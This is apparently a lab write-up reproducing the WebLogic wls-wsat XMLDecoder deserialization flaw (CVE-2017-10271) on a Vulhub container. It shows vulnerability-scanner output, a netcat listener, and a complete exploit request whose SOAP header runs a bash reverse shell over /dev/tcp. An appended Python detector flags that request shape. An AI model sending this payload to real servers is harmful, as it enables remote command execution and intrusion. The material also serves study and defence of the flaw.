阳光之夏 posted on 2023-9-5 22:18:04

weblogic-10.3.6-'wls-wsat'-XMLDecoder deserialization vulnerability-(CVE-2017-10

Contents

[*]1.1. Vulnerability description
[*]1.2. Severity
[*]1.3. Affected versions
[*]1.4. Reproducing the vulnerability

[*]1. Base environment
[*]2. Vulnerability scanning
[*]nacs
[*]weblogicScanner
[*]3. Vulnerability verification


Item: Content
Vulnerability ID: CVE-2017-10271
Vulnerability name: Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability (CVE-2017-10271)
Severity: High
Affected versions: 10.3.6
Description: WebLogic's WLS Security component exposes a webservice that uses XMLDecoder to parse user-supplied XML data; a deserialization flaw during parsing allows arbitrary command execution.
Remediation: apply the patch; deploy a security appliance; upgrade the component

1.1. Vulnerability description

WebLogic is an application server produced by the US company Oracle, more precisely a middleware product built on the Java EE architecture. It is a Java application server for developing, integrating, deploying and managing large distributed web applications, network applications and database applications, bringing Java's dynamic features and the security of the Java Enterprise standards to the development, integration, deployment and management of large network applications.
WebLogic's WLS Security component exposes a webservice that uses XMLDecoder to parse user-supplied XML data. A deserialization flaw during parsing allows arbitrary command execution.
1.2. Severity

High
1.3. Affected versions

10.3.6
1.4. Reproducing the vulnerability

1. Base environment

Path: Vulhub/weblogic/CVE-2017-10271
Start the test environment:
sudo docker-compose up -d
Wait a while, then visit http://your-ip:7001/. A 404 page means WebLogic has started successfully.
The WebLogic login address is your-ip:7001/console

2. Vulnerability scanning

nacs

View the help information:
./nacs -h
┌──(kali㉿kali)-[~/tools/nacs/0.0.3]
└─$ sudo ./nacs -h 192.168.80.141 -pa 7001
__   ___   ___   ___   
| \| |   /   \   / __|   / __|
| .|   | - || (__    \__ \
|_|\_|   |_|_|   \___|   |___/
             Version: 0.0.3
Start to probe alive machines
[*] Target 192.168.80.141 is alive
There are total of 1 hosts, and 1 are surviving
Too few surviving hosts
Start to discover the ports
[*] ssh://192.168.80.141:22
[*] http://192.168.80.141:7001
A total of 2 targets, the rule base hits 2 targets
Start to send pocs to web services (xray type)
Load 397 xray poc(s)
[+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2017-10271 reverse
Start to process nonweb services
ssh 192.168.80.141
Task finish, consumption of time: 3m35.385936144s

weblogicScanner

Project address: https://github.com/0xn0ne/weblogicScanner
┌──(kali㉿kali)-[~/tools/weblogic/weblogicScanner]
└─$ python ws.py -t 192.168.80.141                                    
[-] Not found.
[+] Exists vulnerability!
[+] Found module, Please verify manually!
[-] Not vulnerability.
[-] Not vulnerability.
[!] Connection error.
[-] Not vulnerability.
[-] Not vulnerability.
[-] Not vulnerability.
[-] Not vulnerability.
[+] Found module, Please verify manually!
[+] Found module, Please verify manually!
[+] Exists vulnerability!
[+] Found module, Please verify manually!
[+] Exists vulnerability!
[+] Found module, Please verify manually!
[!] Connection error.
[-] Not vulnerability.
[+] Exists vulnerability!
[+] Exists vulnerability!
[+] Exists vulnerability!
[+] Exists vulnerability!
[+] Exists vulnerability!
[-] Not vulnerability.
[-] Not found.
[-] Not vulnerability.
Run completed, 27 seconds total.

3. Vulnerability verification

Visit the /wls-wsat/CoordinatorPortType page.

Change the request method to POST.

Listen on port 21 on Kali:
nc -lvp 21
Send the following packet (note that the reverse shell statement in it must be encoded, otherwise the XML parser will report a format error):
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.80.141:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=vq4hk23V21rs9yG5nGTvYkGppFGmFrvzzM2tvtw2pSnKQCsjPmvt!-1799840789
Connection: close
Content-Type: text/xml
Content-Length: 641

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" >
<void >
<array length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.80.141/21 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

Shell obtained successfully.
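As an added defensive example (not part of the original post, and not code from Vulhub, nacs or weblogicScanner), the following Python function inspects one HTTP request for the payload shape shown above: a POST to a /wls-wsat/ path whose SOAP header carries a work:WorkContext element containing XMLDecoder directives such as java, void and array, and a void with a method attribute. The two namespace URIs come from the request in the post; the function names, the Finding structure and the two sample bodies are constructed for this example. The "payload" sample keeps the structure of the request above but replaces the command string with a placeholder.

```python
"""Added example (not from the original post): flag SOAP requests to /wls-wsat/
whose WorkContext header carries XMLDecoder elements, the shape CVE-2017-10271 abuses."""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Namespace URIs taken from the request shown in the post.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"

# Element names that java.beans.XMLDecoder interprets as object construction or
# method invocation; none of them belongs in a legitimate WorkContext header.
XMLDECODER_TAGS = {"java", "void", "array", "object", "new", "method", "class"}


@dataclass
class Finding:
    suspicious: bool = False
    reasons: list[str] = field(default_factory=list)


def local_name(tag: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def inspect_request(method: str, path: str, body: str) -> Finding:
    """Return a Finding for one HTTP request (method, URL path, raw body)."""
    finding = Finding()
    # Only the wls-wsat web service parses WorkContext with XMLDecoder.
    if method.upper() != "POST" or not path.startswith("/wls-wsat/"):
        return finding
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # WebLogic would reject this as well; record it, but it is not an XMLDecoder payload.
        finding.reasons.append("malformed XML body")
        return finding
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return finding
    work = header.find(f"{{{WORK_NS}}}WorkContext")
    if work is None:
        return finding
    # Collect every element name below (and including) WorkContext.
    tags = {local_name(el.tag) for el in work.iter()}
    hits = sorted(tags & XMLDECODER_TAGS)
    if hits:
        finding.suspicious = True
        finding.reasons.append("XMLDecoder elements in WorkContext: " + ", ".join(hits))
    # A <void method="..."> is a method call on the object being constructed.
    for el in work.iter():
        if local_name(el.tag) == "void" and el.get("method"):
            finding.reasons.append("method invocation: " + el.get("method"))
    return finding


# Constructed samples. BENIGN_BODY is an ordinary SOAP request with no WorkContext;
# PAYLOAD_BODY keeps the structure of the request in the post but replaces the
# command with a placeholder string.
BENIGN_BODY = (
    f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}">'
    "<soapenv:Header/><soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>"
)
PAYLOAD_BODY = (
    f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Header>'
    f'<work:WorkContext xmlns:work="{WORK_NS}"><java version="1.4.0"><void>'
    '<array length="1"><void index="0"><string>PLACEHOLDER_COMMAND</string></void>'
    '</array><void method="start"/></void></java></work:WorkContext>'
    "</soapenv:Header><soapenv:Body/></soapenv:Envelope>"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("payload", PAYLOAD_BODY)):
        f = inspect_request("POST", "/wls-wsat/CoordinatorPortType", body)
        print(label, "suspicious" if f.suspicious else "clean", f.reasons)
```

The check keys on the request path and the SOAP header rather than on any particular command string, so it does not depend on how the reverse shell statement is encoded; a WAF rule or log-replay job built on it would flag the request above and pass the benign sample. The namespace lookups are exact, so a payload that declares the WorkContext under a different prefix is still matched, since ElementTree resolves prefixes to URIs.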


Source: https://www.cnblogs.com/saury/archive/2023/09/05/17680974.html